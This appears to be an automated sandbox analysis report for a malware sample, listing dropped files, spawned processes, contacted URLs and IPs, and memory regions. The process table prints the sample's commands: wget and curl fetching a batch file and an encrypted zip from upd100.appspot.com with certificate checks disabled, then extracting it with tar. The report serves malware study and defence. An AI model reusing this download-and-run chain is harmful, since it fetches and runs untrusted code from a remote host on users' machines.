Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
C:\Users\user\Desktop\download\u.bat
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
 |
|
|
C:\Users\user\Desktop\cmdline.out
|
ASCII text, with CRLF line terminators
|
modified
|
||
|
C:\Users\user\Desktop\download\u.zip
|
Zip archive data, at least v2.0 to extract, compression method=AES Encrypted
|
modified
|
||
|
\Device\ConDrv
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\SysWOW64\wget.exe
|
wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0
(Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://upd100.appspot.com/update/u.bat"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition
--user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://upd100.appspot.com/update/u.bat"
> cmdline.out 2>&1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\download\u.bat" "
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\curl.exe
|
curl -o u.zip --insecure https://upd100.appspot.com/update/u.zip
|
||
|
C:\Windows\System32\tar.exe
|
tar xf u.zip
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://upd100.appspot.com/update/u.bat
|
|
||
|
https://upd100.appspot.com/update/u.batG
|
unknown
|
||
|
https://upd100.appspot.com/update/u.bat
|
142.250.9.153
|
||
|
https://upd100.appspot.com/update/u.zipO
|
unknown
|
||
|
https://upd100.appspot.com/update/u.zip
|
142.250.9.153
|
||
|
https://upd100.appspot.com/update/u.zipcurl
|
unknown
|
||
|
https://upd100.appspot.com/update/u.zipWinsta0
|
unknown
|
||
|
https://upd100.appspot.com/update/u.zipu
|
unknown
|
||
|
https://upd100.appspot.com/update/u.bater
|
unknown
|
||
|
https://upd100.appspot.com/update/u.zipRmWO
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
upd100.appspot.com
|
142.250.9.153
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
127.0.0.1
|
unknown
|
unknown
|
||
|
142.250.9.153
|
upd100.appspot.com
|
United States
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
28312190000
|
heap
|
page read and write
|
||
|
1E441DCB000
|
heap
|
page read and write
|
||
|
2831228C000
|
heap
|
page read and write
|
||
|
283121A0000
|
heap
|
page read and write
|
||
|
9CD000
|
stack
|
page read and write
|
||
|
105F000
|
stack
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
106A000
|
heap
|
page read and write
|
||
|
F0B77D000
|
stack
|
page read and write
|
||
|
1D6000
|
heap
|
page read and write
|
||
|
283122A7000
|
heap
|
page read and write
|
||
|
B55A8FD000
|
stack
|
page read and write
|
||
|
2831229D000
|
heap
|
page read and write
|
||
|
9C000
|
stack
|
page read and write
|
||
|
11AE000
|
heap
|
page read and write
|
||
|
B60000
|
heap
|
page read and write
|
||
|
106D000
|
heap
|
page read and write
|
||
|
B55A9FE000
|
stack
|
page read and write
|
||
|
109F000
|
heap
|
page read and write
|
||
|
283121E0000
|
remote allocation
|
page read and write
|
||
|
1096000
|
heap
|
page read and write
|
||
|
2831228C000
|
heap
|
page read and write
|
||
|
11AC000
|
heap
|
page read and write
|
||
|
109E000
|
heap
|
page read and write
|
||
|
190000
|
heap
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
1090000
|
heap
|
page read and write
|
||
|
28312267000
|
heap
|
page read and write
|
||
|
283122D0000
|
heap
|
page read and write
|
||
|
2831225B000
|
heap
|
page read and write
|
||
|
2831226A000
|
heap
|
page read and write
|
||
|
28312266000
|
heap
|
page read and write
|
||
|
1E441DF6000
|
heap
|
page read and write
|
||
|
28312250000
|
heap
|
page read and write
|
||
|
2831226F000
|
heap
|
page read and write
|
||
|
B55AAFF000
|
stack
|
page read and write
|
||
|
1E441DC0000
|
heap
|
page read and write
|
||
|
1060000
|
heap
|
page read and write
|
||
|
E5F000
|
stack
|
page read and write
|
||
|
11A0000
|
heap
|
page read and write
|
||
|
18E000
|
stack
|
page read and write
|
||
|
10A4000
|
heap
|
page read and write
|
||
|
283121E0000
|
remote allocation
|
page read and write
|
||
|
109A000
|
heap
|
page read and write
|
||
|
28312270000
|
heap
|
page read and write
|
||
|
283122A0000
|
heap
|
page read and write
|
||
|
2831226F000
|
heap
|
page read and write
|
||
|
2831228D000
|
heap
|
page read and write
|
||
|
ADE000
|
stack
|
page read and write
|
||
|
10A5000
|
heap
|
page read and write
|
||
|
283122B7000
|
heap
|
page read and write
|
||
|
28312272000
|
heap
|
page read and write
|
||
|
283122A4000
|
heap
|
page read and write
|
||
|
283121C0000
|
heap
|
page read and write
|
||
|
28312273000
|
heap
|
page read and write
|
||
|
1E441D00000
|
heap
|
page read and write
|
||
|
B68000
|
heap
|
page read and write
|
||
|
14E000
|
stack
|
page read and write
|
||
|
109E000
|
heap
|
page read and write
|
||
|
11A5000
|
heap
|
page read and write
|
||
|
283122B7000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
283122E9000
|
heap
|
page read and write
|
||
|
1E441D10000
|
heap
|
page read and write
|
||
|
283125F0000
|
heap
|
page read and write
|
||
|
283121E0000
|
remote allocation
|
page read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
10A0000
|
heap
|
page read and write
|
||
|
28312257000
|
heap
|
page read and write
|
||
|
2E8F000
|
stack
|
page read and write
|
||
|
109A000
|
heap
|
page read and write
|
||
|
11AB000
|
heap
|
page read and write
|
||
|
11AD000
|
heap
|
page read and write
|
||
|
10A2000
|
heap
|
page read and write
|
There are 64 hidden memdumps, click here to show them.